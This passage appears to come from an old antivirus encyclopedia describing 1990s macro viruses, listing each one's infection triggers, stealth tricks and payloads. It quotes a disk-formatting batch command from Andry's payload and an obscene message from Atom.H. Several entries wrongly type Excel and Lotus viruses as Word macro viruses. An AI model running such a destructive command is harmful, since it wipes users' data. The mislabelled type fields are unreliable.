  16777. Atom.A infects documents in two ways, either when
  16778. opening (FileOpen) or saving (FileSaveAs) documents.
  16779. Since Atom.A does not turn prompting off when saving
  16780. the global template (Normal.dot), the user will be
  16781. prompted to save changes to the global template
  16782. (Normal.dot) at the end of a session. Infected documents
  16783. are internally converted into templates, which is very
  16784. common for macro viruses.
  16785.  
  16786. Upon calling the virus macro "FileSaveAs," Atom.A
  16787. checks the system clock for a value of 13 in the seconds
  16788. field. If this is the case then Atom.A adds the password
  16789. "ATOM#1" to the saved document.
  16790.  
  16791. The destructive payload inside the "Atom" macro was
  16792. supposed to be activated on December 13th only, yet
  16793. due to a programming error it is activated on the 13th of
  16794. each month. Atom.A deletes all the files inside the current
  16795. directory.
  16796.  
  16797. Atom.A does not work with Non-English versions of
  16798. Microsoft Word, since it uses English macro names.
  16799. (c) Stefan Kurtzhals
  16800.  
  16801.  
  16802. [Excel_Laroux.A]
  16803. Virus name: Excel.Laroux.A
  16804. Virus Type: Word macro virus
  16805. Number of modules: 1
  16806. Module Name: laroux
  16807. Sub-Routines: Auto_Open, Check_Files
  16808. Place of origin: USA
  16809. Date of origin: 1996
  16810. Payload: No
  16811. Seen In-The-Wild: Yes
  16812. Description: Laroux is the first macro virus written
  16813.              for Microsoft Excel.
  16814.  
  16815. When an infected file is opened (Auto_Open), the "Check_
  16816. files" macro is called (from the Auto_Open macro) and
  16817. PERSONAL.XLS (similar to Word's NORMAL.DOT) becomes
  16818. infected.  Further files become infected when they are
  16819. activated (OnSheetActivate).
  16820.  
  16821. The following sections of the "File Properties" section are
  16822. cleared by Laroux:
  16823.  
  16824. Title
  16825. Subject
  16826. Author
  16827. Keywords
  16828. Comments
  16829.  
  16830. Laroux is not destructive and its macro (laroux) is not hidden
  16831. from the user. It can be located with Word's Tools/Macro
  16832. option.
  16833.  
  16834.  
  16835. [Excel_Robocop]
  16836. Virus name: Excel.Robocop
  16837. Virus Type: Word macro virus
  16838. Number of modules: 2
  16839. Module Name: ROBO, COP
  16840. Sub-Routines: Auto_Open
  16841. Place of origin: Germany
  16842. Date of origin: Unknown
  16843. Payload: Yes
  16844. Seen In-The-Wild: No
  16845. Description: Robocop is another Excel macro virus that was
  16846.              published over the Internet.
  16847.  
  16848. When an infected file is opened (Auto_Open called by ROBO),
  16849. the PERSONAL.XLS becomes infected. Further files become
  16850. infected when they are activated (SheetActivate).
  16851.  
  16852. On March 1st of each year, Robocop inserts the following text
  16853. into the active sheet:
  16854.  
  16855. "   ROBOCOP Nightmare Joker [SLAM]   "
  16856.  
  16857.  
  16858. [Excel_Sofa (a.k.a. MicroSofa)]
  16859. Virus name: Excel.Sofa (a.k.a. MicroSofa)
  16860. Virus Type: Word macro virus
  16861. Number of modules: 1
  16862. Module Name: (11 spaces)
  16863. Sub-Routines: Auto_Open, Auto_Range, Auto_Close,
  16864.                Current_Open
  16865. Place of origin: USA
  16866. Date of origin: Unknown
  16867. Destructive: No
  16868. Seen In-The-Wild: No
  16869. Description: Sofa was the second working Excel macro virus
  16870.              (after Laroux).
  16871.  
  16872. When an infected file is opened, the "Microsoft Excel" title is
  16873. changed to "Microsofa Excel" and the infection routine is
  16874. called upon.
  16875.  
  16876. First, Sofa looks for the BOOK.XLT file and if it can not find
  16877. the file, the system is not yet infected, it will display the
  16878. following message:
  16879.  
  16880. "   Microsoft Excel has detected a corrupted add-in file   "
  16881. "   Click OK to repair this file   "
  16882.  
  16883. Sofa then creates the infected file and displays:
  16884.  
  16885. "   File successfully repaired!   "
  16886.  
  16887. Upon starting Excel the next time, the infected BOOK.XLT file
  16888. is loaded into the system and all further files will become
  16889. infected.
  16890.  
  16891.  
  16892. [Excel_Legend]
  16893. Virus name: Excel.Legend
  16894. Virus Type: Word macro virus
  16895. Number of modules: 1
  16896. Module Name: Legend
  16897. Sub-Routines: Auto_Open, Infect
  16898. Place of origin: USA
  16899. Date of origin: Unknown
  16900. Destructive: No
  16901. Seen In-The-Wild: No
  16902. Description: Legend is another Excel macro virus that was published
  16903.              over the Internet.
  16904.  
  16905. When an infected file is opened, "Auto_Open" sets the
  16906. sub-routine "Infect" as a SheetActivate handler. As a result all
  16907. activated sheets will call the "Infect" sub-routine and
  16908. PERSONAL.XLS or the active sheet will become infected.
  16909.  
  16910. To make recognition of an infection more difficult, Legend
  16911. removes the Tools/Macro option (called macro stealth
  16912. technique).
  16913.  
  16914. Legend will not infect any files if the user name is "   Pyro   "
  16915. and the name of the organization is: "   VBB   ".
  16916.  
  16917. The following message is displayed by Legend:
  16918.  
  16919. "   Pyro [VBB]   "
  16920. "   You've Been Infected By Legend!   "
  16921.  
  16922.  
  16923. [Lotus.Green_Stripe]
  16924. Virus name: Lotus.Green_Stripe
  16925. Virus Type: Word macro virus
  16926. Size: 6256 Bytes
  16927. Place of origin: USA
  16928. Date of origin: 1996
  16929. Payload: Yes
  16930. Seen In-The-Wild: No
  16931. Description:
  16932.  
  16933. Green_Stripe is the first demonstration virus written for Lotus
  16934. AmiPro.  While macro viruses for Microsoft Word spread very
  16935. quick, Green_Stripe is very unlikely to get in the wild.
  16936. AmiPro keeps its macro file separate from the document and
  16937. therefore it will not spread very far. To ensure infection of
  16938. both files, the document and the macro have to be transmitted.
  16939. This is very unlikely to happen when a user sends an infected
  16940. file via e-mail.
  16941.  
  16942. When an infected file is opened, the macro (*.smm) is
  16943. activated. At this point Green_Stripe goes through the
  16944. document directory and tries to open and infect each file
  16945. (.sam). The user will experience files being opened and closed
  16946. very quickly which should alert the user. Green_Stripe creates an
  16947. error message when it tries to open an already opened file.
  16948. New infected macro files are saved with the extension .smm
  16949. and are hidden.
  16950.  
  16951. Further documents become infected when they are saved with
  16952. the "Save" or "SaveAs" option. Another alert for the user
  16953. should be the "SaveAs" box, which looks different compared
  16954. to the original one. The new box has the following title:
  16955.  
  16956. "   Macro Get String   "
  16957.  
  16958. GreenStripe activates its destructive payload when an infected
  16959. file is saved. It will replace the word "its" with "it is". This part
  16960. of the virus does not always work.
  16961.  
  16962.  
  16963. [Word_Alliance]
  16964. Virus name: Word.Alliance
  16965. Virus Type: Word macro virus
  16966. Number of macros: 1
  16967. Encrypted: No
  16968. Macro names: AutoOpen
  16969. Size of macros: 352 Bytes
  16970. Place of origin: USA
  16971. Date of origin: Summer 1996
  16972. Destructive: No
  16973. Common In-The-Wild: No
  16974. Description:
  16975.  
  16976. Upon opening an infected document, Alliance will infect the
  16977. global template (NORMAL.DOT). Further documents become
  16978. infected when they are opened ("AutoOpen").
  16979.  
  16980. Alliance is only infectious on the:
  16981.  
  16982. 2nd day of each month.
  16983. 7th day of each month.
  16984. 11th day of each month.
  16985. 12th day of each month.
  16986.  
  16987. Alliance adds the following comment to the File/Properties
  16988. section:
  16989.  
  16990. "   You have been infected by the Alliance   "
  16991.  
  16992.  
  16993. [Word_Alien.A]
  16994. Virus name: Word.Alien.A
  16995. Virus Type: Word macro virus
  16996. Number of macros: 3
  16997. Encrypted: Yes
  16998. Macro names: AutoOpen, AutoClose, FileSaveAs
  16999. Size of macros: 7037 Bytes
  17000. Place of origin: India
  17001. Date of origin: November 1996
  17002. Payload: Yes
  17003. Seen In-The-Wild: No
  17004. Description:
  17005.  
  17006. Alien infects the global template (normal.dot) when an infected
  17007. document is opened. Further documents become infected when
  17008. they are opened or closed.
  17009.  
  17010. Before infection Alien checks for the string "Alien." If already
  17011. present, Alien does not infect.
  17012.  
  17013. The "ToolsCustomize" and "ToolsMacro" options are removed
  17014. by Alien to make recognition of an infected file more difficult
  17015. (called macro stealth technique).
  17016.  
  17017. With a probability of 50 percent Alien displays the following
  17018. message, on August 1st, and hides the "program manager" in
  17019. Windows 3.x:
  17020.  
  17021. "   Another Year of Survival   "
  17022.  
  17023. Users are then unable to shut down Windows.
  17024.  
  17025. Again with a probability of 50 percent Alien displays the
  17026. following message:
  17027.  
  17028. "   It's Sunday & I intend to relax   "
  17029.  
  17030. Alien then tries to hide the "program manager" and terminate
  17031. Microsoft Word without saving the active document.
  17032.  
  17033. Alien also displays various messages:
  17034.  
  17035. "   You Fascinate Me.   "
  17036. "   Look No Furhter...   "
  17037. "   Hi Beautiful !  "
  17038. "   I'll Be Back !  "
  17039. "   Three Cheers For The Alien. Hip Hip Hooray !   "
  17040. "   Don't Believe the Hype !   "
  17041. "   Always Back Up Your Data.   "
  17042. "   Don't Believe All Tips !   "
  17043. "   Never Trust An Alien !   "
  17044. "   Never Open Other Files !   "
  17045. "   The 'Alien' Virus Has Arrived !   "
  17046. "   The Alien Lives...   "
  17047. "   Longer File Names Should Be Used.   "
  17048.  
  17049.  
  17050.  
  17051. [Word_Alien.B]
  17052. Virus name: Word.Alien.B
  17053. Virus Type: Word macro virus
  17054. Number of macros: 3
  17055. Encrypted: Yes
  17056. Macro names: AutoOpen, AutoClose, FileSaveAs
  17057. Size of macros: 7463 Bytes
  17058. Place of origin: United States
  17059. Date of origin: Spring 1997
  17060. Payload: Yes
  17061. Seen In-The-Wild: No
  17062. Description:
  17063.  
  17064. Alien.B infects the global template (normal.dot) when an
  17065. infected document is opened. Further documents become
  17066. infected when they are opened or closed.
  17067.  
  17068. The "ToolsCustomize" and "ToolsMacro" options are removed
  17069. by Alien.B to make recognition of an infected file more
  17070. difficult (called macro stealth technique).
  17071.  
  17072. The main difference between this new variant and the previous
  17073. Alien.A virus is that Alien.B contains some corrupted code.
  17074.  
  17075. For additional information, please refer to the Alien.A virus
  17076. description.
  17077.  
  17078.  
  17079. [Word_Alien.C]
  17080. Virus name: Word.Alien.C
  17081. Virus Type: Word macro virus
  17082. Number of macros: 3
  17083. Encrypted: Yes
  17084. Macro names: AutoOpen, AutoClose, FileSaveAs
  17085. Size of macros: 7463 Bytes
  17086. Place of origin: United States
  17087. Date of origin: Spring 1997
  17088. Payload: Yes
  17089. Seen In-The-Wild: No
  17090. Description:
  17091.  
  17092. Alien.C infects the global template (normal.dot) when an
  17093. infected document is opened. Further documents become
  17094. infected when they are opened or closed.
  17095.  
  17096. The "ToolsCustomize" and "ToolsMacro" options are removed
  17097. by Alien.C to make recognition of an infected file more
  17098. difficult (called macro stealth technique).
  17099.  
  17100. The main difference between this new variant and the previous
  17101. Alien.A virus is that Alien.C contains some modified codes.
  17102.  
  17103. For additional information, please refer to the Alien.A virus
  17104. description.
  17105.  
  17106.  
  17107. [Word_Alien.D]
  17108. Virus name: Word.Alien.D
  17109. Virus Type: Word macro virus
  17110. Number of macros: 3
  17111. Encrypted: Yes
  17112. Macro names: AutoOpen, AutoClose, FileSaveAs
  17113. Size of macros: 7463 Bytes
  17114. Place of origin: UK
  17115. Date of origin: Spring 1997
  17116. Payload: Yes
  17117. Seen In-The-Wild: No
  17118. Description:
  17119.  
  17120. Alien.D infects the global template (normal.dot) when an
  17121. infected document is opened. Further documents become
  17122. infected when they are also opened or closed.
  17123.  
  17124. The "ToolsCustomize" and "ToolsMacro" options are removed
  17125. by Alien.D to make recognition of an infected file more
  17126. difficult (called macro stealth technique).
  17127.  
  17128. The main difference between this new variant and the previous
  17129. Alien.B virus is that Alien.D contains a one byte corruption in
  17130. its AutoOpen macro.
  17131.  
  17132. For additional information, please refer to the Alien.A virus
  17133. description.
  17134.  
  17135.  
  17136. [Word_Alien.E]
  17137. Virus name: Word.Alien.E
  17138. Virus Type: Word macro virus
  17139. Number of macros: 3
  17140. Encrypted: Yes
  17141. Macro names: AutoOpen, AutoClose, FileSaveAs
  17142. Size of macros: 5061 Bytes
  17143. Place of origin: Unknown
  17144. Date of origin: Spring 1997
  17145. Payload: Yes
  17146. Seen In-The-Wild: No
  17147. Description:
  17148.  
  17149. Alien.E infects the global template (normal.dot) when an
  17150. infected document is opened. Further documents become
  17151. infected when they are also opened or closed.
  17152.  
  17153. The "ToolsCustomize" and "ToolsMacro" options are removed
  17154. by Alien.E to make recognition of an infected file more
  17155. difficult (called macro stealth technique).
  17156.  
  17157. The main difference between this new variant and previous
  17158. Alien viruses is that Alien.E contains some modified codes.
  17159.  
  17160. For additional information, please refer to the Alien.A virus
  17161. description.
  17162.  
  17163.  
  17164.  
  17165. [Word_Alien.F]
  17166. Virus name: Word.Alien.F
  17167. Virus Type: Word macro virus
  17168. Number of macros: 3
  17169. Encrypted: Yes
  17170. Macro names: AutoOpen, AutoClose, FileSaveAs
  17171. Size of macros: 8201 Bytes
  17172. Place of origin: United States
  17173. Date of origin: Spring 1997
  17174. Payload: Yes
  17175. Seen In-The-Wild: No
  17176. Description:
  17177.  
  17178. Alien.F infects the global template (normal.dot) when an infected
  17179. document is opened. Further documents become infected when
  17180. they are also opened or closed.
  17181.  
  17182. The "ToolsCustomize" and "ToolsMacro" options are removed
  17183. by Alien.F to make recognition of an infected file more
  17184. difficult (called macro stealth technique).
  17185.  
  17186. The main difference between this new variant and previous
  17187. Alien viruses is that Alien.F contains a corrupted "FileSaveAs"
  17188. macro.
  17189.  
  17190. For additional information, please refer to the Alien.A virus
  17191. description.
  17192.  
  17193.  
  17194. [Word_Anak.A]
  17195. Virus name: Word.Anak.A
  17196. Virus Type: Word macro virus
  17197. Number of macros: 5
  17198. Encrypted: Yes
  17199. Macro names: anakAE, AutoOpen,anakAO, anakSA, anakSMU,
  17200.                        (AutoExec, FileSave)
  17201. Size of macros: 5578 Bytes in documents
  17202.                 4737 Bytes in global template
  17203. Place of origin: Indonesia
  17204. Date of origin: March 1997
  17205. Payload: Yes
  17206. Seen In-The-Wild: No
  17207. Description:
  17208.  
  17209. Anak infects the global template (normal.dot) when an infected
  17210. document is opened. Further documents become infected when
  17211. they are saved (FileSave).
  17212.  
  17213. Anak removes ToolsMacro, FileTemplates, and ToolsCustomize
  17214. to make recognition of an infected document more difficult
  17215. (called macro stealth technique).
  17216.  
  17217. At the end of each month (starting on the 26th), Anak creates a
  17218. new file and inserts the following text into it:
  17219.  
  17220. "   ...i n t r o d u c i n g...anakSMU Semarang, March 1997   "
  17221.  
  17222. Anak also modifies the C:\AUTOEXEC.BAT file to add itself to
  17223. the system registry:
  17224.  
  17225. "   @ECHO OFF                                                      "
  17226. "   REM ---------------------------------------------------------  "
  17227. "   REM anakSMU wont destroy your REGEDIT, Just wanna be there :)  "
  17228. "   REM          email: anakSMU@TheOffice.net"                     "
  17229. "   REM ---------------------------------------------------------  "
  17230.  
  17231. The following message is displayed by Anak:
  17232.  
  17233. "   Yeah!, I wish I were anakSMU.   "
  17234.  
  17235.  
  17236.  
  17237. [Word_Andry.A]
  17238. Virus name: Word.Andry.A
  17239. Virus Type: Word macro virus
  17240. Number of macros: 1
  17241. Encrypted: Yes
  17242. Macro names: AutoOpen
  17243. Size of macros: 6896 Bytes
  17244. Place of origin: Indonesia
  17245. Date of origin: Spring 1997
  17246. Destructive: Yes
  17247. Seen In-The-Wild: No
  17248. Description:
  17249.  
  17250. Andry.A infects the global template (normal.dot) when an
  17251. infected document is opened. Further documents become
  17252. infected when they are also opened (AutoOpen).
  17253.  
  17254. Andry hides FileTemplate, FormatStyle, ToolsCustomize,
  17255. ToolsMacro, and ViewToolbars to make recognition of an
  17256. infected document more difficult (called macro stealth
  17257. technique).  We advise not to use those menu items, since
  17258. Andry attaches its viral macro to those commands.
  17259.  
  17260. On March 1st, Andry encrypts infected documents with the following
  17261. password:
  17262.  
  17263. "   Andry Christian   "
  17264.  
  17265. If you find a document with an unknown password, please
  17266. download a copy of WinWord Password Recovery Tool
  17267. (wwprt). It is available at: www.vdsarg.com.
  17268.  
  17269. When a document is opened and the second field shows 1 or 3,
  17270. Andry replaces all text with the following:
  17271.  
  17272. "   Hello...Andry Christian WordMacro Virus is Here...."
  17273.  
  17274. Also on March 1st, Andry displays the following message and
  17275. asks for user input:
  17276.  
  17277. "   HACKERS Labs '96 - Hackware Technology Research   "
  17278. "   ANDRY [CHRISTIAN] WORD MACRO VIRUS IS HERE !!!   "
  17279. "   DO YOU SUPPORT MY VIRUS ?   "
  17280.  
  17281. In case of a Yes, nothing happens.
  17282.  
  17283. In case of a No, Andry overwrites the AUTOEXEC.BAT file
  17284. and tries to format the hard disk.
  17285.  
  17286. "   @ECHO OFF   "
  17287. "   CLS   "
  17288. "   ECHO Please wait . . .   "
  17289. "   FORMAT C: /U /C /S /AUTOTEST > NUL   "
  17290.  
  17291. The following comment can also be found in the virus code:
  17292.  
  17293. "====================================================================="
  17294. "  Source Code of Andry Christian WordMacro Virus 0.99 - _eta Release "
  17295. "====================================================================="
  17296. "   Virographer by Andry [Christian] in [Batavia] City, of INDONESIA  "
  17297. " Viroright (C) 1996-1999 Hackware Technology Research - HACKERS Labs."
  17298. "  Multi Platform, Multi Infector, Stealth, OneMacro, Encryption, etc "
  17299. "   Last Update by 01-Maret-1996 & 01:03 PM - Found Bugs...? Call Me  "
  17300. "====================================================================="
  17301. "   HACKERS Labs. -> WE ARE A BIG FAMILY OF THE VIRUS CREATOR's TEAM  "
  17302. "====================================================================="
  17303.  
  17304.  
  17305. [Word_Appder.A]
  17306. Virus name: Word.Appder.A (a.k.a.FunYour)
  17307. Virus Type: Word macro virus
  17308. Number of macros: 2 or 3
  17309. Encrypted: No
  17310. Macro names: Appder, AutoOpen, AutoClose
  17311. Size of macros: 1912 Bytes in .doc files
  17312.                 1126 Bytes in global template
  17313. Place of origin: Unknown
  17314. Date of origin: Unknown
  17315. Destructive: Yes
  17316. Seen In-The-Wild: No
  17317. Description:
  17318.  
  17319. Appder infects the global template (normal.dot) when an
  17320. infected document is opened. Further documents become
  17321. infected when they are closed.
  17322.  
  17323. Appder adds a "NTTHNTA=xx" value to the [Microsoft Word] section of
  17324. winword6.ini and increases the value by one when infecting documents.
  17325. Upon reaching a value of 20, Appder triggers its destructive payload
  17326. and deletes the following files:
  17327.  
  17328. C:\DOC\*.exe
  17329. C:\DOC\*.com
  17330. C:\WINDOWS\*.exe
  17331. C:\WINDOWS\SYSTEM\*.TTF
  17332. C:\WINDOWS\SYSTEM\*.FOT
  17333.  
  17334. As a result, Windows 3.x does not work properly.
  17335.  
  17336.  
  17337. [Word_Appder.B (a.k.a.FunYour)]
  17338. Virus name: Word.Appder.B (a.k.a.FunYour)
  17339. Virus Type: Word macro virus
  17340. Number of macros: 2 or 3
  17341. Encrypted: No
  17342. Macro names: Appder, AutoOpen, AutoClose
  17343. Size of macros: 1528 Bytes in documents
  17344.                 934 Bytes in global template
  17345. Place of origin: Unknown
  17346. Date of origin: Unknown
  17347. Destructive: No
  17348. Seen In-The-Wild: Yes
  17349. Description:
  17350.  
  17351. The difference between this new variant and the original
  17352. Appder.A virus is that the payload has been deleted from the
  17353. macro code.  Therefore Appder.B does not delete any files.
  17354.  
  17355. Appder.B infects the global template (normal.dot) when an
  17356. infected document is opened.  Further documents become
  17357. infected when they are closed (AutoClose).
  17358.  
  17359.  
  17360. [WordAppder.C (a.k.a.FunYour)]
  17361.  
  17362. Virus name: Word.Appder.C (a.k.a.FunYour)
  17363. Virus Type: Word macro virus
  17364. Number of macros: 2 or 3
  17365. Encrypted: No
  17366. Macro names: Appder, AutoOpen, AutoClose
  17367. Size of macros: 1912 Bytes in .doc files
  17368.                 1126 Bytes in global template
  17369. Place of origin: Unknown
  17370. Date of origin: Unknown
  17371. Destructive: Yes
  17372. Seen In-The-Wild: No
  17373. Description:
  17374.  
  17375. The difference between this new variant and the original
  17376. Appder.A virus is that Appder.C has a one byte code modification.
  17377.  
  17378. Appder.C infects the global template (normal.dot) when an
  17379. infected document is opened. Further documents become
  17380. infected when they are closed (AutoClose).
  17381.  
  17382. Appder.C adds a "NTTHNTA=xx" value to the [Microsoft Word] section
  17383. of winword6.ini and increases the value by one when infecting documents.
  17384. Upon reaching a value of 20, Appder.C triggers its destructive payload
  17385. and deletes the following files:
  17386.  
  17387. C:\DOC\*.exe
  17388. C:\DOC\*.com
  17389. C:\WINDOWS\*.exe
  17390. C:\WINDOWS\SYSTEM\*.TTF
  17391. C:\WINDOWS\SYSTEM\*.FOT
  17392.  
  17393. As a result, Windows 3.x does not work properly.
  17394.  
  17395.  
  17396. [Word_Atom.A (a.k.a Atomic)]
  17397. Virus name: Word.Atom.A (a.k.a. Atomic)
  17398. Virus Type: Word macro virus
  17399. Number of macros: 4
  17400. Encrypted: Yes
  17401. Macro names: Atom, AutoOpen, FileOpen, FileSaveAs
  17402. Size of macros: 1029 Bytes
  17403. Place of origin: Ukraine
  17404. Date of origin: February 1996
  17405. Destructive: Yes
  17406. Common In-The-Wild: Yes
  17407. Description:
  17408.  
  17409. Atom infects the global template (Normal.dot) once an infected
  17410. document is opened. Further documents become infected when
  17411. a document is opened (FileOpen) or saved (FileSaveAs).
  17412.  
  17413. When the "FileSaveAs" macro is called, Atom checks the
  17414. system clock for a value of 13 in the seconds field. If this is the
  17415. case, Atom adds the password "ATOM#1" to the saved document.
  17416.  
  17417. The destructive payload inside "Atom" is activated on the
  17418. 13th of each month. On this day, Atom deletes all the files
  17419. inside the current directory.
  17420.  
  17421.  
  17422. [Word_Atom.B]
  17423. Virus name: Word.Atom.B
  17424. Virus Type: Word macro virus
  17425. Number of macros: 4
  17426. Encrypted: Yes
  17427. Macro names: Atom, AutoOpen, FileOpen, FileSaveAs
  17428. Size of macros: 1053 Bytes
  17429. Place of origin: Unknown
  17430. Date of origin: December 1996
  17431. Destructive: Yes
  17432. Common In-The-Wild: No
  17433. Description:
  17434.  
  17435. The difference between this new variant and the original
  17436. Atom.A virus is only minor. It does not affect the
  17437. functionality of this new variant.
  17438.  
  17439. For more information, please refer to the Atom.A virus description.
  17440.  
  17441.  
  17442. [Word_Atom.C]
  17443. Virus name: Word.Atom.C
  17444. Virus Type: Word macro virus
  17445. Number of macros: 4
  17446. Encrypted: Yes
  17447. Macro names: Atom, AutoOpen, FileOpen, FileSaveAs
  17448. Size of macros: 1026 Bytes
  17449. Place of origin: Unknown
  17450. Date of origin: December 1996
  17451. Destructive: Yes
  17452. Common In-The-Wild: No
  17453. Description:
  17454.  
  17455. The difference between this new variant and the original
  17456. Atom.A virus is only minor. It does not affect the
  17457. functionality of this new variant.
  17458.  
  17459. For more information, please refer to the Atom.A virus description.
  17460.  
  17461.  
  17462. [Word_Atom.D]
  17463. Virus name: Word.Atom.D
  17464. Virus Type: Word macro virus
  17465. Number of macros: 4
  17466. Encrypted: Yes
  17467. Macro names: Atom, AutoOpen, FileOpen, FileSaveAs
  17468. Size of macros: 1024 Bytes
  17469. Place of origin: Unknown
  17470. Date of origin: December 1996
  17471. Destructive: Yes
  17472. Common In-The-Wild: No
  17473. Description:
  17474.  
  17475. The difference between this new variant and the original
  17476. Atom.A virus is only minor. It does not affect the
  17477. functionality of this new variant.
  17478.  
  17479. For more information, please refer to the Atom.A virus description.
  17480.  
  17481.  
  17482. [Word_Atom.E]
  17483. Virus name: Word.Atom.E
  17484. Virus Type: Word macro virus
  17485. Number of macros: 4
  17486. Encrypted: Yes
  17487. Macro names: Atom, AutoOpen, FileOpen, FileSaveAs
  17488. Size of macros: 1017 Bytes
  17489. Place of origin: Unknown
  17490. Date of origin: December 1996
  17491. Destructive: Yes
  17492. Common In-The-Wild: No
  17493. Description:
  17494.  
  17495. The difference between this new variant and the original
  17496. Atom.A virus is only minor. It does not affect the
  17497. functionality of this new variant.
  17498.  
  17499. The programming error in Atom.A, which activates the
  17500. payload on the 13th of each month, has been fixed in this new
  17501. variant. Atom.E activates only on the 13th of December.
  17502.  
  17503. For more information, please refer to the Atom.A virus description.
  17504.  
  17505.  
  17506. [Word_Atom.F]
  17507. Virus name: Word.Atom.F
  17508. Virus Type: Word macro virus
  17509. Number of macros: 4
  17510. Encrypted: Yes
  17511. Macro names: Atom, AutoOpen, FileOpen, FileSaveAs
  17512. Size of macros: 1022 Bytes
  17513. Place of origin: Unknown
  17514. Date of origin: December 1996
  17515. Destructive: Yes
  17516. Common In-The-Wild: No
  17517. Description:
  17518.  
  17519. The difference between this new variant and the original
  17520. Atom.A virus is only minor. It does not affect the
  17521. functionality of this new variant.
  17522.  
  17523. For more information, please refer to the Atom.A virus description.
  17524.  
  17525.  
  17526. [Word_Atom.G:De (a.k.a Atomic)]
  17527. Virus name: Word.Atom.G:De (a.k.a. Atomic)
  17528. Virus Type: Word macro virus
  17529. Number of macros: 4
  17530. Encrypted: Yes
  17531. Macro names: Atom, AutoOpen, DateiOeffnen, DateiSpeichernUnter
  17532. Size of macros: 1120 Bytes
  17533. Place of origin: Germany
  17534. Date of origin: February 1996
  17535. Destructive: Yes
  17536. Common In-The-Wild: No
  17537. Description:
  17538.  
  17539. Atom.G infects the global template (Normal.dot) once an
  17540. infected document is opened. Further documents become
  17541. infected when a document is opened (DateiOeffnen) or saved
  17542. (DateiSpeichernUnter).
  17543.  
  17544. When the "DateiSpeichernUnter" macro is called, Atom.G
  17545. checks the system clock for a value of 13 in the seconds field.
  17546. If this is the case, Atom.G adds the password "ATOM#1" to
  17547. the saved document.
  17548.  
  17549. The destructive payload inside "Atom" is activated on the
  17550. 13th of December. On this day, Atom.G deletes all the files
  17551. inside the current directory.
  17552.  
  17553. Atom.G only works with the German version of Microsoft
  17554. Word, since it uses language specific macros.
  17555.  
  17556.  
  17557. [Word_Atom.H (a.k.a Adultsex)]
  17558. Virus name: Word.Atom.H (a.k.a. Adultsex)
  17559. Virus Type: Word macro virus
  17560. Number of macros: 4
  17561. Encrypted: Yes
  17562. Macro names: Atom, AutoOpen, FileOpen, FileSaveAs
  17563. Size of macros: 1302 Bytes
  17564. Place of origin: Unknown
  17565. Date of origin: February 1996
  17566. Destructive: Yes
  17567. Common In-The-Wild: No
  17568. Description:
  17569.  
  17570. The difference between this new variant and the original
  17571. Atom.A virus is that the payload has been changed in this
  17572. new variant.
  17573.  
  17574. Instead of deleting files, Atom.H displays the following
  17575. message when opening documents:
  17576.  
  17577.         "KISS ME FUCK ME LOVE ME BITCH SUCK MY DICK ADULT SEX  !!
  17578.         I LOVE SEX DRUGS CLASS A DRUGS YEAH MAN !
  17579.         I ASK YOU MY DARLING FOR ANAL SEX GIVE IT TO ME !
  17580.         EVER DANCED WITH THE DEVIL ON THE MOONLIGHT ?
  17581.         PREY FOR YOUR CUNT YOU SEXY HORNEY BITCH"
  17582.  
  17583. The password, which is added to a saved document, was also
  17584. changed from "ATOM#1" to "ADULTSEX#1."
  17585.  
  17586. For more information, please refer to the Atom.A virus description.
  17587.  
  17588.  
  17589. [Word_Attack.A]
  17590. Virus name: Word.Attack.A
  17591. Virus Type: Word macro virus
  17592. Number of macros: 8
  17593. Encrypted: Yes
  17594. Macro names: AutoOpen, Active, Attack, FileOpen, FileSaveAs,
  17595.              InActive, Organizer, ToolsMacro
  17596. Size of macros: 8201 Bytes
  17597. Place of origin: UK
  17598. Date of origin: Spring 1997
  17599. Payload: Yes
  17600. Seen In-The-Wild: No
  17601. Description:
  17602.  
  17603. Attack.A infects the global template (normal.dot) when an
  17604. infected document is opened. Further documents become
  17605. infected when they are also opened (FileOpen) or saved
  17606. (FileSaveAs).
  17607.  
  17608. Attack uses ToolsMacro to make recognition of an infected
  17609. document more difficult (called macro stealth technique).
  17610.  
  17611. Attack has various payloads:
  17612.  
  17613. 1. It deletes files.
  17614. 2. It changes file attributes to hidden.
  17615. 3. It replaces text with the following:
  17616.  
  17617. "   This is Microsoft Bang!**Virus**---   "
  17618.  
  17619. 4. It sets the following password to saved documents:
  17620.  
  17621. "   Virii   "
  17622.  
  17623. If you find a document with an unknown password, please
  17624. download a copy of the WinWord Password Recovery Tool (wwprt).
  17625. It is available at: www.vdsarg.com.
  17626.  
  17627.  
  17628. [Word_Badboy.A]
  17629. Virus name: Word.Badboy.A
  17630. Virus Type: Word macro virus
  17631. Number of macros: 5
  17632. Encrypted: Yes
  17633. Macro names: BadBoy, FileNew, AutoExec, AutoOpen, FileSaveAs
  17634. Size of macros: 1873 Bytes
  17635. Place of origin: Unknown
  17636. Date of origin: Unknown
  17637. Payload: Yes
  17638. Seen In-The-Wild: No
  17639. Description:
  17640.  
  17641. Badboy infects the global template (normal.dot) when an
  17642. infected document is opened.  Further documents become
  17643. infected when they are saved with the "FileSaveAs" command.
  17644.  
  17645. When an infected file is opened on the 1st and 13th of each
  17646. month (normal.dot is already infected), Badboy displays the
  17647. following message and then sets the "   gangsta   " password
  17648. to the active document:
  17649.  
  17650. "   Bad Boy BadBoy, What u gonna do "
  17651. "   What u gonna do when they come for you   "
  17652. "   The Gangsta owns you !   "
  17653. "   Have a happy new year !   "
  17654.  
  17655. Badboy also changes the File Summary info to the following:
  17656.  
  17657. "   Author = Kenny-G sux   "
  17658. "   Keywords = Gangsta Rappa   "
  17659. "   Comments = The Mutha mix   "
  17660.  
  17661. To make recognition of an infected file more difficult Badboy
  17662. removes the Tools/Macro, Tools/Customize and File/Templates
  17663. menus (called macro stealth technique).
  17664.  
  17665.  
  17666. [Word_Bandung.A (a.k.a. Jakarta)]
  17667. Virus name: Word.Bandung.A (a.k.a. Jakarta)
  17668. Virus Type: Word macro virus
  17669. Number of macros: 6
  17670. Encrypted: No
  17671. Macro names: AutoExec, AutoOpen, FileSave, FileSaveAs
  17672.              Toolsmacro, Toolscustomize
  17673. Size of macros: 4262 Bytes
  17674. Place of origin: Bandung, Indonesia
  17675. Date of origin: August/September 1996
  17676. Destructive: Yes
  17677. Seen In-The-Wild: Yes
  17678. Description:
  17679.  
  17680. Bandung infects the global template (Normal.dot) when an
  17681. infected document is opened. Further documents are infected
  17682. with the "FileSave" and "FileSaveAs" commands.
  17683.  
  17684. Bandung uses macro stealth techniques to hide itself. It uses
  17685. "ToolsMacro" to make recognition of an infected document
  17686. more difficult (called macro stealth technique).
  17687.  
  17688. The destructive payload activates when Microsoft Word is
  17689. started.  It checks the date and time and in case of a date later
  17690. than the 19th of each month and a time after 11:00 am, Bandung
  17691. deletes all files in all directories.
